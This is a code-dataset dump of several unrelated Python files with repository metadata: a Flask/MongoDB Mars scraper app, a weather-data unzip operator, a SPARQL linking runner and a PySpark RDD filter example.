w_cons, acc_cons, s_attr_to_fp_fn_test_cons = train_test_classifier()
psb.plot_boundaries(X, y, x_control, [w_uncons, w_cons], [acc_uncons, acc_cons], [s_attr_to_fp_fn_test_uncons["s1"], s_attr_to_fp_fn_test_cons["s1"]], "img/syn_cons_dtype_%d_cons_type_%d.png"%(data_type, cons_type) )
print "\n-----------------------------------------------------------------------------------\n"
return
def main():
test_synthetic_data()
if __name__ == '__main__':
main() | 447 | 0 | 47 |
7d1f457eda8d5e9c802cfb9bf88971d19416931d | 672 | py | Python | app.py | labulel/web-scraping-challenge | 02f5b49b99802ec018a1451387d4a5cba538213c | [
"Apache-2.0"
] | null | null | null | app.py | labulel/web-scraping-challenge | 02f5b49b99802ec018a1451387d4a5cba538213c | [
"Apache-2.0"
] | null | null | null | app.py | labulel/web-scraping-challenge | 02f5b49b99802ec018a1451387d4a5cba538213c | [
"Apache-2.0"
] | null | null | null | from flask import Flask, render_template, redirect
from flask_pymongo import PyMongo
import scrape_mars
app = Flask(__name__)
#use flask_pymongo to set up mongo connection
app.config ["MONGO_URI"] = "mongodb://localhost:27017/mars_app"
mongo = PyMongo(app)
@app.route("/")
@app.route("/scrape")
if __name__ =="__main__":
app.run(debug = True)
| 24.888889 | 63 | 0.696429 | from flask import Flask, render_template, redirect
from flask_pymongo import PyMongo
import scrape_mars
app = Flask(__name__)
#use flask_pymongo to set up mongo connection
app.config ["MONGO_URI"] = "mongodb://localhost:27017/mars_app"
mongo = PyMongo(app)
@app.route("/")
def index():
#Find Mars data
Mars = mongo.db.data.find_one()
#Return the result on home page
return render_template("index.html", data = Mars)
@app.route("/scrape")
def scraper():
Mars = mongo.db.data
Mars_data = scrape_mars.scrape()
Mars.update({}, Mars_data, upsert = True)
return redirect("/", code = 302)
if __name__ =="__main__":
app.run(debug = True)
| 276 | 0 | 44 |
3e7fdd30f2753e8e86e5f06e72426a7a4a2ba883 | 3,669 | py | Python | operators/teched21/unzip/script.py | thhapke/dilocal | 1d3c1b7b1a4513e9bff7efd77f680f66014ff499 | [
"MIT"
] | null | null | null | operators/teched21/unzip/script.py | thhapke/dilocal | 1d3c1b7b1a4513e9bff7efd77f680f66014ff499 | [
"MIT"
] | null | null | null | operators/teched21/unzip/script.py | thhapke/dilocal | 1d3c1b7b1a4513e9bff7efd77f680f66014ff499 | [
"MIT"
] | null | null | null | # For local development
#from utils.mock_di_api import mock_api
#api = mock_api(__file__,False)
import pandas as pd
import copy
import zipfile
import re
import io
from datetime import datetime
CREATE_SQL = False
api.set_port_callback('input',on_input) # datatype: message
| 40.318681 | 133 | 0.624693 | # For local development
#from utils.mock_di_api import mock_api
#api = mock_api(__file__,False)
import pandas as pd
import copy
import zipfile
import re
import io
from datetime import datetime
CREATE_SQL = False
def on_input(msg) :
api.logger.info('Unzip: {}'.format(msg.attributes['zipfile']))
try :
with zipfile.ZipFile(io.BytesIO(msg.body)) as zipp :
dwd_files = zipp.namelist()
r = re.compile("produkt_klima_tag.+\.txt")
datafile = list(filter(r.match, dwd_files))[0]
datastr = zipp.read(datafile).decode('latin-1')
except zipfile.BadZipFile as bzf:
print(str(bzf))
api.logger.warning('Bad zip file: \"{}\" ({})'.format(msg.attributes['zipfile'],str(bzf)))
return -1
data = datastr.split('\n')
recs = [ [rd.strip() for rd in d.split(';') ] for d in data]
map_col = {'STATIONS_ID': 'STATIONS_ID', 'MESS_DATUM': 'MEASUREMENT_DATE', 'QN_3': 'QUALITY_LEVEL_3', 'FX': 'MAX_WINDGUST',
'FM': 'MEAN_WIND_VELOCITY', 'QN4': 'QUALITY_LEVEL_4', 'RSK': 'PRECIPITATION_HEIGHT',
'RSKF': 'PRECIPITATION_TYPE', 'SDK': 'SUN_DURATION', 'SHK_TAG': 'SNOW_DEPTH', 'NM': 'CLOUD_COVER',
'VPM': 'VAPOR_PRESSURE', 'PM': 'MEAN_PRESSURE', 'TMK': 'MEAN_TEMPERATURE', 'UPM': 'MEAN_REL_HUMIDITY',
'TXK': 'MAX_TEMPERATURE', 'TNK': 'MIN_TEMPERATURE', 'TGK': 'MIN_AIR_TEMPERATURE', 'eor': 'EOR'}
col_type = {'STATIONS_ID': 'integer', 'MEASUREMENT_DATE': 'timestamp', 'MAX_WINDGUST':'float',
'MEAN_WIND_VELOCITY':'float','PRECIPITATION_HEIGHT':'float',
'PRECIPITATION_TYPE':'integer','SUN_DURATION':'float','SNOW_DEPTH':'float','CLOUD_COVER':'float',
'VAPOR_PRESSURE':'float', 'MEAN_PRESSURE':'float','MEAN_TEMPERATURE':'float', 'MEAN_REL_HUMIDITY':'float',
'MAX_TEMPERATURE':'float', 'MIN_TEMPERATURE':'float','MIN_AIR_TEMPERATURE':'float'}
df = pd.DataFrame(recs[1:],columns=map_col.values())
df.drop(columns=['EOR','QUALITY_LEVEL_3','QUALITY_LEVEL_4'],inplace=True)
for col in df.columns :
if col == 'MEASUREMENT_DATE' :
df['MEASUREMENT_DATE'] = pd.to_datetime(df['MEASUREMENT_DATE'],format='%Y%m%d')
else :
df[col] = pd.to_numeric(df[col])
df.replace(-999,pd.NA,inplace=True)
df.dropna(axis=0,thresh=3,inplace=True)
df.fillna(-999,inplace=True)
#df.dropna(axis=1,how='any',inplace=True)
#df.replace('-999',pd.NA,inplace=True)
#df['MEASUREMENT_DATE'] = df['MEASUREMENT_DATE'].apply(lambda x: datetime.strptime(x,'%Y%m%d').strftime('%Y-%m-%d %H:%M:%S.%f0'))
# ONLY USED for dev
if CREATE_SQL :
schema = 'DEVICES'
table_name = 'DAILY_WEATHER'
sql_str = f"CREATE COLUMN TABLE {schema}.{table_name} (\n"
for col in df.columns :
data_type = col_type[col]
sql_str += f'\"{col}\" {data_type}, \n'
sql_str += "PRIMARY KEY (STATIONS_ID,MEASUREMENT_DATE)"
sql_str += ')'
print(sql_str)
return 0
table_dict = {'version':1,'name':'DAILY_WEATHER','columns':list()}
for col in df.columns :
table_dict['columns'].append({'name':col,'class': col_type[col].lower()})
# Sending to outport output
att = copy.deepcopy(msg.attributes)
att['table'] = table_dict
df.fillna('', inplace=True)
table_data = df.values.tolist()
out_msg = api.Message(attributes=att,body=table_data)
api.logger.info(f'Send to DB ROW 0 : {table_data[0]}')
api.send('output',out_msg) # datatype: message
api.set_port_callback('input',on_input) # datatype: message
| 3,366 | 0 | 23 |
857067ba58d9c2f2c4f08cd9db43c47d2da1d464 | 1,663 | py | Python | geolimes.py | akirsche/geoLIMES | 09f0f93f244fcdf056ea870c2524af15d3d757db | [
"MIT"
] | null | null | null | geolimes.py | akirsche/geoLIMES | 09f0f93f244fcdf056ea870c2524af15d3d757db | [
"MIT"
] | null | null | null | geolimes.py | akirsche/geoLIMES | 09f0f93f244fcdf056ea870c2524af15d3d757db | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from json import JSONDecodeError, loads
from os import makedirs
from os.path import exists, isdir
from urllib.error import HTTPError
from cache import Cache
from config import Config, ConfigNotValidError, load_config
from logger import InfoLogger
from mapper import Mapper
from sparql import SPARQL
| 29.696429 | 130 | 0.644618 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from json import JSONDecodeError, loads
from os import makedirs
from os.path import exists, isdir
from urllib.error import HTTPError
from cache import Cache
from config import Config, ConfigNotValidError, load_config
from logger import InfoLogger
from mapper import Mapper
from sparql import SPARQL
class goeLIMES:
def __init__(self, database_config):
self.database_config = database_config
def run(self, config_json, to_file=True):
self.create_dirs()
results = None
try:
config = Config(config_json, self.database_config)
source_sparql = SPARQL(config, 'source')
target_sparql = SPARQL(config, 'target')
info_logger = InfoLogger('InfoLogger', '{}_{}'.format(source_sparql.get_query_hash(), target_sparql.get_query_hash()))
source_cache = Cache(info_logger, config, source_sparql, 'source')
source_cache.create_cache()
target_cache = Cache(info_logger, config, target_sparql, 'target')
target_cache.create_cache()
mapper = Mapper(info_logger, config, source_sparql, target_sparql)
results = mapper.map(to_file)
except ConfigNotValidError as e:
results = "Config not valid"
print(e)
except HTTPError as e:
print(e)
except JSONDecodeError as e:
print(e)
return results
def create_dirs(self):
if not exists('logs') or not isdir('logs'):
makedirs('logs')
if not exists('output') or not isdir('output'):
makedirs('output')
| 1,218 | -6 | 103 |
37eda14ffda685570b9da0c62550b975235a9f69 | 1,715 | py | Python | src/main/py/com/example/core/rdd/filter.py | brijeshdhaker/spark-python-examples | bb3504d21c073448c336c228f74449de68853b8d | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-07-18T16:23:56.000Z | 2021-07-18T16:23:56.000Z | src/main/py/com/example/core/rdd/filter.py | brijeshdhaker/spark-python-examples | bb3504d21c073448c336c228f74449de68853b8d | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/main/py/com/example/core/rdd/filter.py | brijeshdhaker/spark-python-examples | bb3504d21c073448c336c228f74449de68853b8d | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | #
import sys
import com.example.utils.commons as commons
from pyspark.sql import SparkSession
if __name__ == "__main__":
if len(sys.argv) != 1:
print("Usages: spark-file <in-path> <out-path>")
sys.exit(-1)
#
spark = SparkSession \
.builder \
.master("spark://spark-master:7077")\
.appName("PythonRDD-Filter") \
.getOrCreate()
data = [
("James", "Sales", "NY", 90000, 34, 10000),
("Kenith", "Marketing", "CA", 66000, 36, 40000),
("Michael", "Sales", "NY", 86000, 56, 20000),
("Robert", "Sales", "CA", 81000, 30, 23000),
("Maria", "Finance", "CA", 90000, 24, 23000),
("Raman", "Finance", "CA", 99000, 40, 24000),
("Scott", "Finance", "NY", 83000, 36, 19000),
("Jen", "Finance", "NY", 79000, 53, 15000),
("Jeff", "Marketing", "CA", 80000, 25, 18000),
("Shelly", "Marketing", "NY", 60000, 15, 18000),
("Kumar", "Marketing", "NY", 91000, 50, 21000)
]
rdd_1 = spark.sparkContext.parallelize(data)
print("RDD-1 Partition Count : %i " % (rdd_1.getNumPartitions()))
print("RDD-1 Record Count : %i " % (rdd_1.count()))
commons.print_separator()
rdd_2 = rdd_1.filter(lambda x: x[4] > 30)
print(rdd_2.collect())
print("RDD-2 Partition Count : %i " % (rdd_2.getNumPartitions()))
print("RDD-2 Record Count : %i " % (rdd_2.count()))
commons.print_separator()
rdd_3 = rdd_1.filter(m_filter)
print(rdd_3.collect())
print("RDD-3 Partition Count : %i " % (rdd_3.getNumPartitions()))
print("RDD-3 Record Count : %i " % (rdd_3.count()))
commons.print_separator()
print("Details available at http://localhost:4040")
#option = input("Do You Want to Kill Spark Job Process Y/N : ")
#
spark.stop()
| 28.583333 | 65 | 0.623324 | #
import sys
import com.example.utils.commons as commons
from pyspark.sql import SparkSession
if __name__ == "__main__":
if len(sys.argv) != 1:
print("Usages: spark-file <in-path> <out-path>")
sys.exit(-1)
def m_filter(element):
return element[4] > 30
#
spark = SparkSession \
.builder \
.master("spark://spark-master:7077")\
.appName("PythonRDD-Filter") \
.getOrCreate()
data = [
("James", "Sales", "NY", 90000, 34, 10000),
("Kenith", "Marketing", "CA", 66000, 36, 40000),
("Michael", "Sales", "NY", 86000, 56, 20000),
("Robert", "Sales", "CA", 81000, 30, 23000),
("Maria", "Finance", "CA", 90000, 24, 23000),
("Raman", "Finance", "CA", 99000, 40, 24000),
("Scott", "Finance", "NY", 83000, 36, 19000),
("Jen", "Finance", "NY", 79000, 53, 15000),
("Jeff", "Marketing", "CA", 80000, 25, 18000),
("Shelly", "Marketing", "NY", 60000, 15, 18000),
("Kumar", "Marketing", "NY", 91000, 50, 21000)
]
rdd_1 = spark.sparkContext.parallelize(data)
print("RDD-1 Partition Count : %i " % (rdd_1.getNumPartitions()))
print("RDD-1 Record Count : %i " % (rdd_1.count()))
commons.print_separator()
rdd_2 = rdd_1.filter(lambda x: x[4] > 30)
print(rdd_2.collect())
print("RDD-2 Partition Count : %i " % (rdd_2.getNumPartitions()))
print("RDD-2 Record Count : %i " % (rdd_2.count()))
commons.print_separator()
rdd_3 = rdd_1.filter(m_filter)
print(rdd_3.collect())
print("RDD-3 Partition Count : %i " % (rdd_3.getNumPartitions()))
print("RDD-3 Record Count : %i " % (rdd_3.count()))
commons.print_separator()
print("Details available at http://localhost:4040")
#option = input("Do You Want to Kill Spark Job Process Y/N : ")
#
spark.stop()
| 28 | 0 | 23 |